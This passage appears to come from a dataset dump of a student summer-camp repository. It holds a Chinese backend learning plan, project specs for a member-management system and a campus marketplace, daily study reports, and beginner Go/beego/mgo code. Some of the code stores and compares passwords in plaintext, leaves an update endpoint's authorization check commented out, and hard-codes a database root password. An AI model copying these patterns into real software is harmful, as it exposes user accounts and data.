一、准备工作\n\n**注:准备工作主要是作为参考,不做要求,可以跳过,这里涉及到一些你写项目的时候可能会需要的知识**\n\n### 1. 环境准备\n\n+ 推荐使用 Linux or Mac 作为开发系统\n\n+ git\n\n+ 搭建本地开发环境\n\n 高性能反向代理代理服务器软件: Nginx/Openresty\n\n 数据库:MySQL/MongoDB/PostGreSQL\n\n 缓存数据库:Redis/memcached\n\n 语言环境:Python/Go/Java/PHP/node/Kotlin等\n\n 容器工具:Docker,docker-compose\n\n 云服务器:可以选择 阿里云或者腾讯云的学生套餐, 仅10元一月,前期学习只需要在本地即可,后期可能会用到\n\n 注:斜杠划分的选择其一即可\n\n+ 选择好自己适合的开发工具,如:编辑器 vscode,用不惯的话 IDE 亦可\n\n+ 安装一款后台接口测试工具,如:Postman\n\n### 2. 语言 \n\n- Python\n - [廖雪峰的Python3教程](https://www.liaoxuefeng.com/wiki/0014316089557264a6b348958f449949df42a6d3a2e542c000)\n [廖雪峰的Python2教程](https://www.liaoxuefeng.com/wiki/001374738125095c955c1e6d8bb493182103fac9270762a000)\n - [Python3入门指南-官方中文](http://www.pythondoc.com/pythontutorial3/)\n [Python2入门指南-官方中文](http://www.pythondoc.com/pythontutorial27/index.html)\n - [Python 代码规范(Google 开源项目风格指南)](http://zh-google-styleguide.readthedocs.io/en/latest/google-python-styleguide/python_style_rules/) (必需)\n\n- Go\n - [官方链接](https://golang.org/)\n - [官方中文教程](https://tour.go-zh.org/welcome/1)\n - [语言规范](https://go-zh.org/ref/spec)\n\n- PHP\n\n + [PHP 代码规范](https://www.php-fig.org/psr/) \n\n- Java\n - [菜鸟教程](http://www.runoob.com/java/java-tutorial.html) \n - Java 代码规范\n\n- Node\n\n 关键字:单线程,异步,回调地域,Promise,async/await\n\n - [菜鸟教程-Node](http://www.runoob.com/nodejs/nodejs-install-setup.html)\n - [Node10.5 中文文档](http://nodejs.cn/api/) \n - [Node 官方文档](https://nodejs.org/api/) \n - [airbnb node 代码规范](https://github.com/airbnb/javascript) , [node 代码规范](https://github.com/dead-horse/node-style-guide)\n\n- Kotlin\n - [官方教程](http://kotlinlang.org/docs/tutorials/)\n\n### 3. 框架\n\n- Python\n\n 可能会用到 uWSGI 启动\n\n - Flask\n - Django\n - sanic\n\n- Go\n\n 其实原生的以及封装的很好了\n\n - Gin\n - Echo\n - Beego\n\n- PHP\n - Laravel\n\n - CodeIgniter\n\n- Java\n\n Servlet 写小一点的东西也行\n\n - SSM + Spring Boot\n\n - Play\n\n https://github.com/playframework/playframework\n\n - Spark\n\n https://github.com/perwendel/spark/\n\n- Node\n\n - express\n - Koa\n\n- Kotlin\n\n### 4. 涉及知识\n\n#### 认证:\n\n熟悉以下三种前后端认证方式,一般在登录时使用\n\n- cookie\n- session\n- JWT\n\n#### 加密算法:\n\n不同需求,对应不同加密方式,先了解\n\n- 对称加密\n- 非对称加密\n- 哈希算法\n\n### 4. 基本前端知识和前后端交互\n\n注:初学前端请使用 Chrome\n\n- 基本 HTML、CSS 知识\n\n **关键字:**\n\n + HTML:布局,表格表单,区块,元素,列表\n + CSS:盒模型,样式表,选择器,浮动,定位\n\n- 基本 JavaScript\n\n **关键字:事件,DOM操作,作用域,变量,函数**\n\n 注:前端可使用相关UI框架和 JS 框架(react,vue),以及一些比较好用的 js 包(如请求包 axios),可自行选择,具体可以咨询前端组的同学。\n\n- HTTP基本知识\n\n 如:HTTP 方法:GET、POST、PUT、UPDATE等,HTTP状态码:404,500, 200,301等,HTTP URL,HTTP 基本传输格式:json,form等\n\n **关键字:HTTP 方法,HTTP状态码,HTTP传输格式,HTTP头部**\n\n- 前后端如何交互\n\n 如:前端如何获取后端返回的数据,如何发送请求,后端如何根据前端发过来的请求,回应请求,如何辨别不同的请求\n\n **关键字: js 请求库(axios, fetch, superagent选其一,原生亦可),URL, 域名,ip**\n\n### 5. 数据库\n\n学习基本操作(增删改查)即可,以后可自行研究\n\n- MySQL/MongoDB/PostGreSQL\n- Redis\n\n可在菜鸟教程上速成\n\n## 二、热身\n\n注:前端能看就行,不是硬性要求,但是要求采用前后端分离的方式,拒绝后端渲染\n\n#### 简易成员管理系统:\n\n具体要求:\n\n+ 管理员登录/注册\n\n 管理员与普通成员信息类似\n\n 注:登录之后注意用户认证问题,如:从浏览器退出此页面之后,再次进入页面如何辨认此用户,登录过期等问题\n\n+ 普通成员注册\n\n 注册之后,需要管理员审核通过才能成为组员\n\n+ 查看未审核的成员,审核成员注册是否通过\n\n+ 添加成员\n\n 成员必须信息如下:用户ID(字符串),密码(要求在数据库中加密存储),邮箱,手机号,昵称,组别\n\n 其他信息自行思考\n\n+ 删除成员\n\n+ 修改成员信息\n\n+ 获取所有成员信息\n\n+ 可以根据组别显示成员\n\n**关键字: 认证,数据库,成员管理**\n\n## 三、项目\n\n注:前端能看就行,不是硬性要求,但是要求采用前后端分离的方式,拒绝后端渲染\n\n### 商城系统:\n\n形式不定:网页,小程序,桌面程序均可\n\n基本功能:\n\n+ 登录注册\n\n 用户密码使用不可逆加密\n\n+ 商品按照类别查询\n\n 如:商品类别:电子设备、书籍资料、宿舍百货、美妆护肤、女装、男装、鞋帽配饰、门票卡券、其他\n\n+ 商品按照地域查询\n\n 如:韵苑、沁苑、紫菘、其他\n\n+ 热门查询、最新查询\n\n 热门查询可在后台记录用户的浏览数据等信息\n\n+ 商品页面\n\n + 商品详细信息\n\n 标题、简介、价格等\n\n + 图片\n\n 图片可以存在本地,或者使用七牛云存储\n\n+ 个人信息页\n\n + 个人基本信息\n + 浏览量\n\n进阶功能:\n\n+ 图片压缩\n\n 浏览时显示压缩的小图片,详细页显示大一点的图片\n\n+ 收藏夹\n\n+ 商品浏览量、收藏量等\n\n+ 后台系统\n\n + 商品上架、下架\n + 商品信息变动\n + 系统通知\n\n+ 消息提醒\n\n 如:降价提醒、系统推送\n\n+ 接入微信或者QQ\n\n## 四、项目部署\n\n### 1. 配置nginx\n\n学习配置 nginx 做中间代理层,具体可从以下链接中选取部分学习,作为示例,夏令营之后可以好好研究,当然夏令营期间有时间也可以自行研究,遇到坑可以问我们。\n\n[nginx 配置简介](https://juejin.im/post/5ad96864f265da0b8f62188f) \n\n[openresty 实践](https://juejin.im/post/5aae659c6fb9a028d375308b)\n\n### 2. 配置 docker\n\n[Docker 从入门到实践](https://yeasy.gitbooks.io/docker_practice/content/install/ubuntu.html) \n\n[Docker 实践](https://juejin.im/post/5b34f0ac51882574ec30afce) \n\n### 3. 配置域名https (不要求)\n\n前提:有已经备案的域名,有服务器\n\n[Let's Encrypt 给网站加 HTTPS 完全指南](https://ksmx.me/letsencrypt-ssl-https/?utm_source=v2ex&utm_medium=forum&utm_campaign=20160529) \n\n## 五、附录\n\n### 1. 夏令营聚合\n\n+ 冰岩程序组夏令营:https://github.com/mu-mo/bingyan-summer-camp2018\n+ 冰岩前端组夏令营:https://github.com/BingyanStudioFE/summber-camp-2018\n+ 冰岩移动组夏令营: https://github.com/Liujiaohan/bingyan-summer-camp2018\n+ 冰岩产品组夏令营:\n+ 冰岩运营组夏令营:\n+ 冰岩设计组夏令营:\n+ 冰岩游戏组夏令营:https://github.com/CurryPseudo/bingyan-summer-camp-2018\n\n### 2. 书籍推荐\n\n#### Python:\n\n- [Python 基础教程](https://zhiguangxiong.gitbooks.io/python/content/di-2-zhang-lie-biao-he-yuan-zu/tong-yong-xu-lie-cao-zuo.html) \n\n 不推荐快速入门\n\n- [简明Python教程](https://bop.mol.uno/)\n\n- [Effective Python 中文版](https://guoruibiao.gitbooks.io/effective-python/content/) [Effective Python 原版](https://hacktec.gitbooks.io/effective-python/content/en/) \n\n 很高质量的一本书,让你领略 Python 的一些哲学,以及一些 Python 的使用经验,适合有一定基础的 Python 选手\n\n- [Flask Web开发](https://item.jd.com/11594082.html) \n\n 讲了很多 web 的基础知识,适合 web 入门\n\n#### Go:\n\n- [《The Go Programming Language》中文版](https://www.gitbook.com/book/yar999/gopl-zh/details)\n\n- [《Effective Go》中英双语版](https://www.gitbook.com/book/bingohuang/effective-go-zh-en/details)\n\n- [Go语言实战](http://download.csdn.net/download/truthurt/9858317)\n\n- [Go Web编程](https://wizardforcel.gitbooks.io/build-web-application-with-golang/content/index.html) \n\n 可以了解基本web开发,推荐入门\n\n- [Go入门指南](https://github.com/Unknwon/the-way-to-go_ZH_CN)\n\n- [雨痕的学习笔记](https://github.com/qyuhen/book)\n\n 一共两本,第二本讲原理多(如:go 的gc, 内存管理等),第一本适合入门\n\n#### PHP:\n\n - 《深入php面向对象、模式与实践》\n - 《细说PHP》\n\n#### Node: \n\n+ 深入浅出 node\n\n#### JS:\n\n+ [你不知道的JavaScript](https://github.com/getify/You-Dont-Know-JS) 上、中、下 \n+ JS 高级程序设计\n+ [ECMAScript 6 入门](http://es6.ruanyifeng.com/) \n\n#### Java:\n\n+ effective Java\n+ Java 核心技术卷\n+ 深入理解jvm虚拟机\n\n### 3. 算法任务(夏令营不要求)\n\n只要你是一个程序员,那么算法对你就是必备!\n\n+ 常见排序算法\n\n 如:冒泡、插入、选择、希尔、堆排序、归并、快排\n\n+ 常见散列\n\n 如:分离链接法、开放定址法(线性探测、平方探测、双散列)\n\n+ 常见数据结构\n\n 如:链表、堆栈、队列、树\n\n+ 常见算法了解\n\n 如:贪婪算法、分治算法、动态规划、回溯\n\n 这些算法主要了解其思想\n\n+ 图论算法\n\n 如:最短路径算法、最小生成树、深搜、宽搜\n\n+ 。。。\n\n书籍推荐:\n\n+ 《数据结构与算法分析 C语言描述》黑皮书,质量很高\n+ 《算法 第四版》普林斯顿的书,好像还不错\n+ 《算法导论》(理论比较多)\n\n### 4. 后台相关学习\n\n+ 面向对象和抽象的思想\n\n+ 熟悉 Github,熟悉 git 版本管理工具的基本命令操作,如:clone, add, commit, push, pull, merge, branch, checkout, tag\n\n+ http 协议,主要阅读《http权威指南》前三章\n\n+ tcp/ip协议,《计算机网络,自顶向下方法》tcp/ip协议至少要知道他的协议栈,每层是干嘛的,tcp连接建立、断开的过程,tcp/udp的区别\n\n+ WebSocket、Socket、TCP、http,http2\n\n+ Linux 常见操作学习,熟悉基本操作, 如:man, ls, mkdir, cd, cp, mv, scp, ssh, rm, ps, cat, head, tail, vim, wget, curl, chmod, chgrp, chown, sudo, grep\n\n+ 了解 linux基本概念:用户组,权限,文件系统,软/硬连接,挂载,启动等\n\n+ 了解 vim 基本操作,毕竟服务器上一般都是用vim操作,没有图像界面\n\n+ 学习 shell 脚本程序\n\n+ 正则表达式\n\n 这个经常用到,不管是那个方向\n\n+ 数据库设计,可以看下《SQL反模式》\n\n+ 常见设计模式,如:MVC模式,装饰器模式\n\n+ 常见安全问题\n\n 常用工具:浏览器 F12,抓包工具:Fiddler, wireshark\n\n - DDOS攻击\n - 中间人攻击\n - sql注入\n - ip欺骗\n - xss攻击\n - csrf\n - 远程脚本执行\n\n+ 操作系统基础知识\n\n 基本特性:并发、共享、虚拟、异步\n\n + CPU 进程调度,线程,进程\n\n + 共享,**信号量,PV操作,锁**\n\n + 内存管理\n\n 虚拟存储,段页式系统,缺页\n\n + 文件系统,ELF文件\n\n+ 分布式了解以及应用\n\n + 数据库分布式\n\n + 分布式常见问题\n\n 一致性问题,共识算法,FLP 不可能性原理,CAP 原理,ACID 原则,拜占庭问题,可靠性指标\n\n + 分布式算法\n\n Paxos 与 Raft\n\n### 5. 相关建议\n\n+ 良好的英文阅读能力对于一个优秀的程序员来说真的很重要,如果可以的话要养成看英文文档的习惯,毕竟很多好的文章、书籍都是国外的,翻译毕竟会有所损失,而且速度更新也没有看英文的快,不要因为觉得自己英语不好就不看英文文档和英文文章,如果只是阅读的话,还是OK的\n+ 对于我们来说,技术好不好其实不一定重要,最重要是你有独立解决问题的能力和对 code 的热爱与勇气。\n" }, { "alpha_fraction": 0.504273533821106, "alphanum_fraction": 0.5299145579338074, "avg_line_length": 5.210526466369629, "blob_id": "97324644907e760efc9cf79784eed221b713fd56", "content_id": "3314ab177397c8aedfdf874d5d65acccb08f55d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 203, "license_type": "no_license", "max_line_length": 15, "num_lines": 19, "path": "/Shixiaoyanger/日报/7.12.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.12日报\n**上午**\n---\n休息了一会儿\n\n---\n\n## **下午**\n\n继续学beego框架\n\n\n---\n## **晚上**\n\nbeego MVC弄明白了\n写出了大致的注册界面及数据记录\n有些bug\n明天改" }, { "alpha_fraction": 0.6944444179534912, "alphanum_fraction": 0.6944444179534912, "avg_line_length": 11.066666603088379, "blob_id": "9b5e053256b2b4815649b7b59b406bfaced58772", "content_id": "d04835bc8dfb0fa560f27244a3adf800dafcb1e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 180, "license_type": "no_license", "max_line_length": 33, "num_lines": 15, "path": "/jackwener/server/练手/main.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package main\n\nimport \"github.com/astaxie/beego\"\n\nimport (\n\t \"hello/models\"\n\t\"hello/routers\"\n)\n\nfunc main() {\n\tmodels.Init()\n\trouters.AdminInit()\n\trouters.IndexInit()\n\tbeego.Run()\n}" }, { "alpha_fraction": 0.7096773982048035, "alphanum_fraction": 0.774193525314331, "avg_line_length": 9.666666984558105, "blob_id": "343601516a766c4dac456073cd25cf917fd002e5", "content_id": "695659d822fa44c07573eea9ab21e44f2069c424", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 79, "license_type": "no_license", "max_line_length": 24, "num_lines": 3, "path": "/Old-Li883/日报/7.7.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.7\n\n今早因工程实训,晚上有事,故没有太多学习相关东西" }, { "alpha_fraction": 0.8389731645584106, "alphanum_fraction": 0.8623104095458984, "avg_line_length": 33.279998779296875, "blob_id": "065b465ca1d1bcb9b140e15a28dfe7ef2cb210ea", "content_id": "a85504fe0aeb925ee48d14795c278c686923159f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2387, "license_type": "no_license", "max_line_length": 210, "num_lines": 25, "path": "/jackwener/日报/7.11.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.11日报\n\n> 今天想了很多,有点感触,想写一些东西,算是对几天前的一个总结\n\n## 感想\n\n从7.6号开始,除开7.8号因为跑远拿修好的电脑,修系统引导启动那一天没怎么学以外,我应该每天都还是花了大量的时间,但对于我自己来说,我并没有感觉到学了太多'东西',就譬如每天在写日报的时候我都感觉没有太多写的,并不像以往那样能写 1个下午,看了1章xx书 之类的,但这几天的 '体验' 让我觉得非常好,我以往实践的很少,code的几乎都是算法,而这种做个小练手项目,跟着ddl跑的体验才是真正的收获,而不是具体的知识。\n\n今天早上10.00开始到现在4.30,我一直在纠结这个成员展示界面的小部分,时间耗在哪里了呢,可能只是为了一个简单功能,却搜索,尝试,辗转了很久发现不过是1个api就能解决的等等,花了很长时间,却是什么都没做,因为实践经历的匮乏,陷入各种坑,或者是学习顺序不对,等等。\n\n显然,不可能刚开始直接就找到最优路径,不过各种跳过的坑或许会加速我们的后面的学习,或者后面的路。\n\n想想,以我现在学过几天的视角来看,回过头,应该怎样学习\n\n1. go语言,快速过,但所有基础的知识都应该有印象 原因:既然准备用框架,那显然涉及到的语言细节不会那么多,有印象保证了你知道有你手里有什么功能可以使用\n\n2. 应该知道什么是自己的主力工具,既然决定了主力工具是框架beego,显然就应该去花一些时间去仔细的阅读他的文档,仔细的了解它的使用,本身学习东西应该是“整体要抓好,具体问题靠拆分然后分析或搜索解决”,这里的整体应该就是框架的整体使用和小项目的实现逻辑,这里自己深有体会,整体的准备工作没做好导致后面的问题太多了\n\n想说的很多,但是表达的却不多,抓好总体大概与脉络,具体问题拆分解决,说起来简单,做起来不擅长也不简单\n\n自己确实还是很菜啊,今天像是什么都没有做,这就是方式出了问题啊,这5天的经历给自己打击还是有的,感觉自己不仅菜,学东西也慢,还差的很远啊。\n\n## 学习内容\n\n没什么太多想说了\n" }, { "alpha_fraction": 0.654629647731781, "alphanum_fraction": 0.6564815044403076, "avg_line_length": 16.536584854125977, "blob_id": "2bd38a467840b19a33ed3e0e04cf15e641ec66eb", "content_id": "358fed6c342c4d688028743ff89b8f907ac4ba17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2224, "license_type": "no_license", "max_line_length": 56, "num_lines": 123, "path": "/Shixiaoyanger/market/controllers/user.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controllers\n\nimport (\n\t\"fmt\"\n\t\"encoding/json\"\n\t\"market/models\"\n\t\"github.com/astaxie/beego\"\n\n\t\n)\n\ntype UserController struct {\n\tMainController\n}\n\n//注册:写入注册信息//1\nfunc (this *UserController) Register(){\t\n\n\tuser := models.User{}\n\terr :=json.Unmarshal(this.Ctx.Input.RequestBody,&user)\n\n\tif err != nil {\n\t\tbeego.Error(err)\n\t\tthis.RetError(errInputData)\n\t} \n\t \n\t ok,err1 := models.AddUser(&user)\n\t \n\tif ok != true{\n\t\tif err1 != nil {\n\t\t\tbeego.Error(err)\n\t\t\tthis.RetError(errDatabase1)\t\t\t\n\t\t} else{\n\t\t\tbeego.Error(err)\n\t\t\tthis.RetError(errDupUser)\n\t\t}\n\t}else{\n\t\tfmt.Println(\"jjjjjj\",user.Username,\"hhhhhhh\")\n\t\tuserstruct := UserStruct{\n\t\t\tUser: user,\n\t\t\tStatusCode: sucregist, \n \t\t}\n\t\tthis.Data[\"json\"] = userstruct\n \tthis.ServeJSON()\t\n\t}\n\t\n\tthis.TplName = \"review.html\"\n}\n\n\n//登录验证.\nfunc (this *UserController) Login(){\n\tvar user models.User\n\terr :=json.Unmarshal(this.Ctx.Input.RequestBody, &user)\n\tif err != nil {\n\t\tbeego.Error(err)\n\t}\n\n\tu := user.Username\n\tp := models.GetDes(user.Password)\n\n\tok,userInfo := models.FindbyUserame(u)\n\tif ok {\n\t\tif p == userInfo.Password {\n\t\t\tthis.Data[\"json\"] =\"登陆成功\"\n\t\t\t//设置session\t\n\t\t\tthis.SetSession(\"username\",user.Username)\n\t\t\t}else{\n\t\t\t\tthis.Data[\"json\"] =\"密码错误\"\n\t\t}\n\t}else{\n\t\t\tthis.Data[\"json\"] =\"账号不存在\"\t\n\t\t}\n\t\n\tthis.ServeJSON()\n\tthis.SetSession(\"username\",user.Username)\n\n\tthis.TplName = \"info.html\"\n}\n\n\n//退出注销.\nfunc (this *UserController) Logout(){\n\n\tthis.DelSession(\"username\")\n\n\tthis.TplName = \"regist.html\"\n}\n\n//\nfunc (this *UserController) Update(){\n\tuser := models.User{}\n\t/*\n\tfmt.Println(\"jjjjjj\",user.Username,\"hhhddhhhh\")\n\tv := this.GetSession(\"username\")\n\tfmt.Println(\"jjjdjjj\",user.Username,\"hhhhhhh\")\n\tif v!= user.Username{\n\t\tthis.Data[\"json\"] = \"userinfo incorrect\"\n\t\tthis.ServeJSON()\n\t\treturn\n\t}\n\t*/\n\terr := json.Unmarshal(this.Ctx.Input.RequestBody,&user)\n\tfmt.Println(\"jjjjjj\",user.Username,\"hhhhhhh\")\n\tif err != nil{\n\t\tbeego.Error(err)\n\t}\n\terr = models.UpdateUser(&user)\n\tif err !=nil{\n\t\tbeego.Error(err)\n\t}\n\n\t_,user = models.FindbyUserame(user.Username)\n\tmodels.IncreaseView(&user)\n\tthis.Data[\"json\"] = \"update success\"\n\tthis.ServeJSON()\n\n\n\n\t\n\n\tthis.TplName = \"regist.html\"\n}\n\n\n\n" }, { "alpha_fraction": 0.6010282635688782, "alphanum_fraction": 0.6154241561889648, "avg_line_length": 21.75438690185547, "blob_id": "23f96b5be599b722acccad0b7b0302b0743fd9ea", "content_id": "bfed05672a53ae756203cc0102aea36e5a504707", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 4156, "license_type": "no_license", "max_line_length": 86, "num_lines": 171, "path": "/yixiaoer/server/src/project1/model/user.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package model\n\nimport (\n\t\"gopkg.in/mgo.v2/bson\"\n\t\"gopkg.in/mgo.v2\"\n\t//\"project/controller\"不可以循环导包\n)\n\ntype User struct {\n\tId string `json:\"id\" form:\"id\"query:\"id\"`\n\tPassword string `json:\"password\" form:\"password\"query:\"password\"`\n\tEmail string `json:\"email\" form:\"email\" query:\"email\"`\n\tPhone string `json:\"phone\" form:\"phone\" query:\"phone\"`\n\tName string `json:\"name\" form:\"name\" query:\"name\"`\n\tGroup string `json:\"group\" form:\"group\" query:\"group\"`\n\tIdentity string `json:\"identity\" form:\"identity\" query:\"identity\"`\n\tStatus string `json:\"status\" form:\"status\" query:\"status\"`\n}\n\nfunc Login(u map[string]string) int8 {\n\tvar i int8\n\tif u [\"name\"]!= \"\" && u[\"password\"]!=\"\" {\n\n\t\tsession, err := mgo.Dial(\"localhost:27017\")\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tdefer session.Close()\n\t\tsession.SetMode(mgo.Monotonic, true) //连接数据库\n\n\t\tc := session.DB(\"test\").C(\"people\")\n\n\t\tvar user1 User\n\t\tvar user2 User\n\t\tc.Find(bson.M{\"name\": u[\"name\"]}).One(&user1) //id由数据库分配,不方便登陆,用name登陆\n\t\tif user1.Name != \"\" { //查找是否存在这个name的用户\n\t\t\tc.Find(bson.M{\"name\": u[\"name\"],\n\t\t\t\t\"password\": u[\"password\"]}).One(&user2)\n\t\t\tif user2.Name != \"\" {\n\t\t\t\ti = 0 //若存在查找是否这个name的用户pw也一致\n\t\t\t} else if user2.Name == \"\" {\n\t\t\t\ti = 1 //密码错误\n\t\t\t}\n\t\t} else if user1.Name == \"\" {\n\t\t\ti = 2 //没有这个name的用户\n\t\t}\n\n\n\n\n\t} else {\n\t\ti = 2\n\t}\n\treturn i\n}\n\nfunc SignUp(u map[string]string) int8 {\n\tvar i int8\n\tprintln(u)\n\tif u[\"password\"] != \"\" && u[\"name\"] != \"\" && u[\"phone\"] != \"\" && u[\"identity\"]!=\"\" {\n\n\t\tsession, err := mgo.Dial(\"localhost:27017\")\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tdefer session.Close()\n\t\tsession.SetMode(mgo.Monotonic, true) //连接数据库\n\n\t\tc := session.DB(\"test\").C(\"people\")\n\n\t\tvar user User\n\t\tc.Find(bson.M{\"name\": u[\"name\"]}).One(&user)\n\t\tif user.Name ==\"\" {\n\t\t\tc.Insert(&u)\n\t\t\ti = 0 //数据库中之前不存在这个name,可以注册\n\t\t} else {\n\t\t\ti = 1 //数据库中已有这个name\n\t\t}\n\t} else {\n\t\ti = 2 //数据不完整\n\t}\n\treturn i\n}\n\nfunc DeleteMember(u map[string]string) {\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\tsession.SetMode(mgo.Monotonic, true) //连接数据库\n\n\tc := session.DB(\"test\").C(\"people\")\n\n\tc.Remove(bson.M{\"name\": u[\"name\"]})\n}\n\nfunc ShowGroup(u map[string]string) []User {\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\tsession.SetMode(mgo.Monotonic, true) //连接数据库\n\n\tc := session.DB(\"test\").C(\"people\")\n\n\tvar users []User //用切片来存放所有查询结果\n\tc.Find(bson.M{\"group\": u[\"group\"]}).All(&users)\n\treturn users\n}\n\nfunc GetInformation(u map[string]string) []User {\n\tvar users []User //用切片来存放所有查询结果\n\tif u[\"information\"] == \"yes\" {\n\t\tsession, err := mgo.Dial(\"localhost:27017\")\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tdefer session.Close()\n\n\t\t// Optional. Switch the session to a monotonic behavior.\n\t\tsession.SetMode(mgo.Monotonic, true)\n\t\tc := session.DB(\"test\").C(\"people\")\n\n\n\t\tc.Find(bson.M{\"identity\": \"member\"}).All(&users)\n\t}\n\treturn users\n}\n\nfunc AddGroup(u map[string]string) {\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\n\t// Optional. Switch the session to a monotonic behavior.\n\tsession.SetMode(mgo.Monotonic, true)\n\tc := session.DB(\"test\").C(\"people\")\n\n\tselector := bson.M{\"name\": u[\"name\"]}\n\tdata := bson.M{\"$set\": bson.M{\"group\": u[\"group\"]}}\n\tc.Update(selector, data)\n}\n\nfunc ChangeInformation(u map[string]string) {\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\n\t// Optional. Switch the session to a monotonic behavior.\n\tsession.SetMode(mgo.Monotonic, true)\n\tc := session.DB(\"test\").C(\"people\")\n\n\tselector := bson.M{\"name\": u[\"name\"]}\n\tdata := bson.M{\n\t\t\"id\": u[\"id\"],\n\t\t\"password\": u[\"password\"],\n\t\t\"email\": u[\"email\"],\n\t\t\"phone\": u[\"phone\"],\n\t\t\"name\": u[\"name\"],\n\t\t\"group\": u[\"group\"],\n\t\t\"identity\": u[\"identity\"],\n\t\t\"status\": u[\"status\"],\n\t}\n\tc.Update(selector, data)\n}" }, { "alpha_fraction": 0.7230769395828247, "alphanum_fraction": 0.7487179636955261, "avg_line_length": 10.529411315917969, "blob_id": "035615b3ea488d751234b67aa1d8164def6d98a3", "content_id": "55166bf25446c9dbfc734deca87b98fe5d99f289", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 475, "license_type": "no_license", "max_line_length": 44, "num_lines": 17, "path": "/Shixiaoyanger/日报/7.17.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.18日报\n\n今天起晚了。。。\n\n下午\n\n1.把热身项目全部重构完成、\n\n2.为正式项目做准备\n\n- 进一步了解前后端交互的的原理,看了好多博客\n\n- 重新看了下beego的路由部分,搞懂了正则路由,自动匹配路由,还有一些快捷的匹配方法\n\n- 总体规划 项目的组成,将项目中的逻辑关系理清,重写了一下项目要求,设计好部分接口,\n\n 设计好user和goods的数据类别。" }, { "alpha_fraction": 0.6086956262588501, "alphanum_fraction": 0.739130437374115, "avg_line_length": 7, "blob_id": "4294486f5672e26d1951a2f6333895306e0d646c", "content_id": "e04a25be6f3356246866cad3b9bc744ddd805c96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 53, "license_type": "no_license", "max_line_length": 15, "num_lines": 3, "path": "/Old-Li883/日报/7.16.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.16\n\n思考网络商城布局,定义相关函数" }, { "alpha_fraction": 0.7492537498474121, "alphanum_fraction": 0.762686550617218, "avg_line_length": 26.95833396911621, "blob_id": "40c4d989262914cc03f6383a005c77da57eb4246", "content_id": "ac405ed7424fcfbc018af0227bb18971a3e25e09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 870, "license_type": "no_license", "max_line_length": 98, "num_lines": 24, "path": "/jackwener/server/练手/models/models.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package models\n\nimport(\n\t\"hello/models/class\" // 注册模型,需要引入该包\n\t\"github.com/astaxie/beego/orm\"\n\t_ \"github.com/go-sql-driver/mysql\"\n)\n\n/*\n使用orm连接数据库步骤:\n//告诉orm使用哪一种数据库\n1.注册数据库驱动RegisterDriver(driverName, DriverType)\n2.注册数据库RegisterDataBase(aliasName, driverName, dataSource, params ...)\n3.注册对象模型RegisterModel(models ...)\n4.开启同步RunSyncdb(name string, force bool, verbose bool)\n*/\n\n// 在init函数中连接数据库,当导入该包的时候便执行此函数\nfunc Init(){\n\torm.RegisterDriver(\"mysql\", orm.DRMySQL)\n\torm.RegisterDataBase(\"default\", \"mysql\", \"root:jakevin@tcp(localhost:3306)/project?charset=utf8\")\n\torm.RegisterModel(new(class.User)) // 注册模型,建立User类型对象,注册模型时,需要引入包\n\torm.RunSyncdb(\"default\", false, true)\n}" }, { "alpha_fraction": 0.8391608595848083, "alphanum_fraction": 0.8601398468017578, "avg_line_length": 27.600000381469727, "blob_id": "81b1e6acf35462512eb1b825542d59b9294a285a", "content_id": "f96c491e0f51251464b9a3dd103368300cc4d129", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 399, "license_type": "no_license", "max_line_length": 101, "num_lines": 5, "path": "/jackwener/日报/7.17.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.17日报\n\n把练手中能用到项目中的简单部分写了,如登录注册展示....\n\n在这个过程中注意到了数据库操作的重要性,事实上,练手项目中设计到数据库的部分不多,这次的很多地方要求提高了很多,当时看东西的时候很多东西学的懵懵懂懂的,现在有必要回去看一次,以及去搜索自行拓展一些内容。\n" }, { "alpha_fraction": 0.7886179089546204, "alphanum_fraction": 0.8130081295967102, "avg_line_length": 16.714284896850586, "blob_id": "d8c7645673ca1607dee031f07f131447c2bae6b3", "content_id": "48daed0dc9287cb38fb4f6c18b5edb2f08c6a632", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 345, "license_type": "no_license", "max_line_length": 75, "num_lines": 7, "path": "/Old-Li883/日报/7.18.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 